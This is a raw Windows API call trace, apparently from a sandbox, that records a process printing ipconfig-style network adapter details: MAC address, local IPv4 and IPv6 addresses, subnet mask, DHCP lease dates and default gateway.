0x1 [0124.112] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.113] _fileno (_File=0x7ffe97fce240) returned 1 [0124.113] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.113] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Ethernet 2:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0124.113] LocalAlloc (uFlags=0x40, uBytes=0x23) returned 0x4847c0 [0124.113] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Ethernet 2:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x4847c0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nEthernet adapter Ethernet 2:\r\n\r\n", lpUsedDefaultChar=0x0) returned 35 [0124.113] _fileno (_File=0x7ffe97fce240) returned 1 [0124.113] _write (in: _FileHandle=1, _Buf=0x4847c0*, _MaxCharCount=0x22 | out: _Buf=0x4847c0*) returned 34 [0124.113] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.113] _fileno (_File=0x7ffe97fce240) returned 1 [0124.113] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.113] LocalFree (hMem=0x4847c0) returned 0x0 [0124.113] LocalFree (hMem=0x47bb80) returned 0x0 [0124.113] __iob_func () returned 0x7ffe97fce210 [0124.113] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x29 [0124.113] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.113] _fileno (_File=0x7ffe97fce240) returned 1 [0124.113] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.113] GetFileType (hFile=0x61c) returned 0x1 [0124.113] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.114] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x489a60 [0124.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x489a60, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Connection-specific DNS Suffix . : \r\n", lpUsedDefaultChar=0x0) returned 42 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _write (in: _FileHandle=1, _Buf=0x489a60*, _MaxCharCount=0x29 | out: _Buf=0x489a60*) returned 41 [0124.114] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.114] LocalFree (hMem=0x489a60) returned 0x0 [0124.114] LocalFree (hMem=0x47bb80) returned 0x0 [0124.114] __iob_func () returned 0x7ffe97fce210 [0124.114] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277f, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x56 [0124.114] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.114] GetFileType (hFile=0x61c) returned 0x1 [0124.114] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0124.114] LocalAlloc (uFlags=0x40, uBytes=0x57) returned 0x47fda0 [0124.114] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n", cchWideChar=-1, lpMultiByteStr=0x47fda0, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n", lpUsedDefaultChar=0x0) returned 87 [0124.114] _fileno (_File=0x7ffe97fce240) returned 1 [0124.114] _write (in: _FileHandle=1, _Buf=0x47fda0*, _MaxCharCount=0x56 | out: _Buf=0x47fda0*) returned 86 [0124.115] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.115] _fileno (_File=0x7ffe97fce240) returned 1 [0124.115] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.115] LocalFree (hMem=0x47fda0) returned 0x0 [0124.115] LocalFree (hMem=0x47bb80) returned 0x0 [0124.115] _vsnwprintf (in: _Buffer=0xcfa30, _BufferCount=0x40, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.115] _vsnwprintf (in: _Buffer=0xcfa36, _BufferCount=0x3a, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="22-") returned 3 [0124.115] _vsnwprintf (in: _Buffer=0xcfa3c, _BufferCount=0x34, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="60-") returned 3 [0124.115] _vsnwprintf (in: _Buffer=0xcfa42, _BufferCount=0x2e, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="79-") returned 3 [0124.115] _vsnwprintf (in: _Buffer=0xcfa48, _BufferCount=0x28, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="47-") returned 3 [0124.115] _vsnwprintf (in: _Buffer=0xcfa4e, _BufferCount=0x22, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="15-") returned 3 [0124.115] __iob_func () returned 0x7ffe97fce210 [0124.115] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2780, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x3a [0124.116] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.116] GetFileType (hFile=0x61c) returned 0x1 [0124.116] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0124.116] LocalAlloc (uFlags=0x40, uBytes=0x3b) returned 0x479cc0 [0124.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n", cchWideChar=-1, lpMultiByteStr=0x479cc0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n", lpUsedDefaultChar=0x0) returned 59 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _write (in: _FileHandle=1, _Buf=0x479cc0*, _MaxCharCount=0x3a | out: _Buf=0x479cc0*) returned 58 [0124.116] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.116] LocalFree (hMem=0x479cc0) returned 0x0 [0124.116] LocalFree (hMem=0x47bb80) returned 0x0 [0124.116] __iob_func () returned 0x7ffe97fce210 [0124.116] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2782, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2c [0124.116] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.116] GetFileType (hFile=0x61c) returned 0x1 [0124.116] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.116] _fileno (_File=0x7ffe97fce240) returned 1 [0124.116] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.116] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.117] LocalAlloc (uFlags=0x40, uBytes=0x2d) returned 0x489e20 [0124.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Enabled. . . . . . . . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x489e20, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCP Enabled. . . . . . . . . . . : Yes\r\n", lpUsedDefaultChar=0x0) returned 45 [0124.117] _fileno (_File=0x7ffe97fce240) returned 1 [0124.117] _write (in: _FileHandle=1, _Buf=0x489e20*, _MaxCharCount=0x2c | out: _Buf=0x489e20*) returned 44 [0124.117] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.117] _fileno (_File=0x7ffe97fce240) returned 1 [0124.117] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.117] LocalFree (hMem=0x489e20) returned 0x0 [0124.117] LocalFree (hMem=0x47bb80) returned 0x0 [0124.117] __iob_func () returned 0x7ffe97fce210 [0124.117] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2789, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2c [0124.117] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.117] _fileno (_File=0x7ffe97fce240) returned 1 [0124.117] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.117] GetFileType (hFile=0x61c) returned 0x1 [0124.117] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.117] _fileno (_File=0x7ffe97fce240) returned 1 [0124.117] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.117] LocalAlloc (uFlags=0x40, uBytes=0x2d) returned 0x4899e0 [0124.117] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Autoconfiguration Enabled . . . . : Yes\r\n", lpUsedDefaultChar=0x0) returned 45 [0124.117] _fileno (_File=0x7ffe97fce240) returned 1 [0124.117] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x2c | out: _Buf=0x4899e0*) returned 44 [0124.118] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.118] _fileno (_File=0x7ffe97fce240) returned 1 [0124.118] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.118] LocalFree (hMem=0x4899e0) returned 0x0 [0124.118] LocalFree (hMem=0x47bb80) returned 0x0 [0124.118] RtlIpv6AddressToStringExW () returned 0x0 [0124.118] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0xcfac0, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc [0124.118] __iob_func () returned 0x7ffe97fce210 [0124.118] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x50 [0124.118] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.118] _fileno (_File=0x7ffe97fce240) returned 1 [0124.118] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.118] GetFileType (hFile=0x61c) returned 0x1 [0124.118] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.118] _fileno (_File=0x7ffe97fce240) returned 1 [0124.118] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0124.118] LocalAlloc (uFlags=0x40, uBytes=0x51) returned 0x47ff20 [0124.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x47ff20, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 81 [0124.118] _fileno (_File=0x7ffe97fce240) returned 1 [0124.118] _write (in: _FileHandle=1, _Buf=0x47ff20*, _MaxCharCount=0x50 | out: _Buf=0x47ff20*) returned 80 [0124.118] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.118] _fileno (_File=0x7ffe97fce240) returned 1 [0124.118] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.119] LocalFree (hMem=0x47ff20) returned 0x0 [0124.119] LocalFree (hMem=0x47bb80) returned 0x0 [0124.119] RtlIpv4AddressToStringExW () returned 0x0 [0124.119] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0xcfac0, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc [0124.119] __iob_func () returned 0x7ffe97fce210 [0124.119] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278a, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x42 [0124.119] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.119] _fileno (_File=0x7ffe97fce240) returned 1 [0124.119] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.119] GetFileType (hFile=0x61c) returned 0x1 [0124.119] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.119] _fileno (_File=0x7ffe97fce240) returned 1 [0124.119] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.119] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0124.119] LocalAlloc (uFlags=0x40, uBytes=0x43) returned 0x4799f0 [0124.119] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n", cchWideChar=-1, lpMultiByteStr=0x4799f0, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 67 [0124.119] _fileno (_File=0x7ffe97fce240) returned 1 [0124.119] _write (in: _FileHandle=1, _Buf=0x4799f0*, _MaxCharCount=0x42 | out: _Buf=0x4799f0*) returned 66 [0124.119] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.119] _fileno (_File=0x7ffe97fce240) returned 1 [0124.119] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.119] LocalFree (hMem=0x4799f0) returned 0x0 [0124.119] LocalFree (hMem=0x47bb80) returned 0x0 [0124.119] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0xcfa18 | out: Mask=0xcfa18) returned 0x0 [0124.119] InetNtopW (in: Family=2, pAddr=0xcfa10, pStringBuf=0xcfa30, StringBufSize=0x41 | out: pStringBuf="255.255.255.0") returned="255.255.255.0" [0124.119] __iob_func () returned 0x7ffe97fce210 [0124.120] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278c, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x36 [0124.120] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.120] _fileno (_File=0x7ffe97fce240) returned 1 [0124.120] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.120] GetFileType (hFile=0x61c) returned 0x1 [0124.120] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.120] _fileno (_File=0x7ffe97fce240) returned 1 [0124.120] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0124.120] LocalAlloc (uFlags=0x40, uBytes=0x37) returned 0x4897a0 [0124.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=-1, lpMultiByteStr=0x4897a0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", lpUsedDefaultChar=0x0) returned 55 [0124.120] _fileno (_File=0x7ffe97fce240) returned 1 [0124.120] _write (in: _FileHandle=1, _Buf=0x4897a0*, _MaxCharCount=0x36 | out: _Buf=0x4897a0*) returned 54 [0124.122] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.122] _fileno (_File=0x7ffe97fce240) returned 1 [0124.122] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.122] LocalFree (hMem=0x4897a0) returned 0x0 [0124.122] LocalFree (hMem=0x47bb80) returned 0x0 [0124.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa08 | out: lpSystemTimeAsFileTime=0xcfa08*(dwLowDateTime=0x731122bc, dwHighDateTime=0x1d8dc25)) [0124.122] FileTimeToLocalFileTime (in: lpFileTime=0xcfa08, lpLocalFileTime=0xcf990 | out: lpLocalFileTime=0xcf990) returned 1 [0124.122] FileTimeToSystemTime (in: lpFileTime=0xcf990, lpSystemTime=0xcf998 | out: lpSystemTime=0xcf998) returned 1 [0124.122] GetDateFormatW (in: Locale=0x400, dwFlags=0x2, lpDate=0xcf998, lpFormat=0x0, lpDateStr=0xcfb40, cchDate=128 | out: lpDateStr="Monday, September 5, 2022") returned 26 [0124.123] GetTimeFormatW (in: Locale=0x400, dwFlags=0x0, lpTime=0xcf998, lpFormat=0x0, lpTimeStr=0xcfb74, cchTime=102 | out: lpTimeStr="12:04:05 PM") returned 12 [0124.123] __iob_func () returned 0x7ffe97fce210 [0124.123] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x27a6, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x4e [0124.123] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.123] _fileno (_File=0x7ffe97fce240) returned 1 [0124.123] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.123] GetFileType (hFile=0x61c) returned 0x1 [0124.123] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.123] _fileno (_File=0x7ffe97fce240) returned 1 [0124.123] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.123] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0124.123] LocalAlloc (uFlags=0x40, uBytes=0x4f) returned 0x47ffe0 [0124.123] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n", cchWideChar=-1, lpMultiByteStr=0x47ffe0, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n", lpUsedDefaultChar=0x0) returned 79 [0124.123] _fileno (_File=0x7ffe97fce240) returned 1 [0124.123] _write (in: _FileHandle=1, _Buf=0x47ffe0*, _MaxCharCount=0x4e | out: _Buf=0x47ffe0*) returned 78 [0124.124] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.124] _fileno (_File=0x7ffe97fce240) returned 1 [0124.124] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.124] LocalFree (hMem=0x47ffe0) returned 0x0 [0124.124] LocalFree (hMem=0x47bb80) returned 0x0 [0124.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfa08 | out: lpSystemTimeAsFileTime=0xcfa08*(dwLowDateTime=0x7313844d, dwHighDateTime=0x1d8dc25)) [0124.124] FileTimeToLocalFileTime (in: lpFileTime=0xcfa08, lpLocalFileTime=0xcf990 | out: lpLocalFileTime=0xcf990) returned 1 [0124.124] FileTimeToSystemTime (in: lpFileTime=0xcf990, lpSystemTime=0xcf998 | out: lpSystemTime=0xcf998) returned 1 [0124.124] GetDateFormatW (in: Locale=0x400, dwFlags=0x2, lpDate=0xcf998, lpFormat=0x0, lpDateStr=0xcfb40, cchDate=128 | out: lpDateStr="Monday, October 10, 2022") returned 25 [0124.124] GetTimeFormatW (in: Locale=0x400, dwFlags=0x0, lpTime=0xcf998, lpFormat=0x0, lpTimeStr=0xcfb72, cchTime=103 | out: lpTimeStr="12:22:13 AM") returned 12 [0124.124] __iob_func () returned 0x7ffe97fce210 [0124.124] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x27a7, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x4d [0124.124] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.124] _fileno (_File=0x7ffe97fce240) returned 1 [0124.124] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.124] GetFileType (hFile=0x61c) returned 0x1 [0124.124] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.124] _fileno (_File=0x7ffe97fce240) returned 1 [0124.124] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.124] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0124.124] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x47fb60 [0124.124] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n", cchWideChar=-1, lpMultiByteStr=0x47fb60, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n", lpUsedDefaultChar=0x0) returned 78 [0124.124] _fileno (_File=0x7ffe97fce240) returned 1 [0124.124] _write (in: _FileHandle=1, _Buf=0x47fb60*, _MaxCharCount=0x4d | out: _Buf=0x47fb60*) returned 77 [0124.124] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.124] _fileno (_File=0x7ffe97fce240) returned 1 [0124.124] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.125] LocalFree (hMem=0x47fb60) returned 0x0 [0124.125] LocalFree (hMem=0x47bb80) returned 0x0 [0124.125] RtlIpv4AddressToStringExW () returned 0x0 [0124.125] __iob_func () returned 0x7ffe97fce210 [0124.125] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278d, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x34 [0124.125] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.125] _fileno (_File=0x7ffe97fce240) returned 1 [0124.125] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.125] GetFileType (hFile=0x61c) returned 0x1 [0124.125] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.125] _fileno (_File=0x7ffe97fce240) returned 1 [0124.125] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.125] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0124.125] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x4899e0 [0124.125] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Default Gateway . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Default Gateway . . . . . . . . . : 192.168.0.1\r\n", lpUsedDefaultChar=0x0) returned 53 [0124.125] _fileno (_File=0x7ffe97fce240) returned 1 [0124.125] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x34 | out: _Buf=0x4899e0*) returned 52 [0124.125] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 